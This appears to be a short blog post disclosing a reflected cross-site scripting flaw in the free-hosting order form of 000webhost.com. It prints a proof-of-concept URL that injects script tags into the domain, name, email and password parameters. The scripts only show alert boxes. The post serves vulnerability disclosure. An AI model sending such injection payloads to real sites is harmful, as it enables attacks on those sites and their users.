One of the Top free web hosting providers, 000WebHost website is found to be vulnerable to Cross site scripting. The vulnerability was discovered by the Cyber Security Researcher Vedachala.
Domain name,Subdomain name and email address field in "Order Free Web Hosting" page of the site (000webhost.com) are vulnerable to xss injection. The web app developer of this site fails to validate those inputs for the special characters that results in this security flaw.
POC code for this security bug:
http://www.000webhost.com/order.php?domain=\"><script>alert(/e hacking news/)</script>&subdomain=\"><script>alert(/e hacking news/)</scrip&name=\"><script>alert(/E Hacking News/)</script>&email=\"><script>alert(/e hacking news/)</script>&pass1=\"><script>alert(/E Hacking New&pass2=\"><script>alert(/E Hacking New&aggree=yes&error_multiple=1&error_domain=1&error_subdomain=1&error_name=&error_email=1&error_pass=4&error_tos=&error_number=&error_js=&error_disposable=&error_bad_gmail=
| Learn Hmei-7.blogspot.com Hacking Courses In Pune by Sysap Technology |
Posting Komentar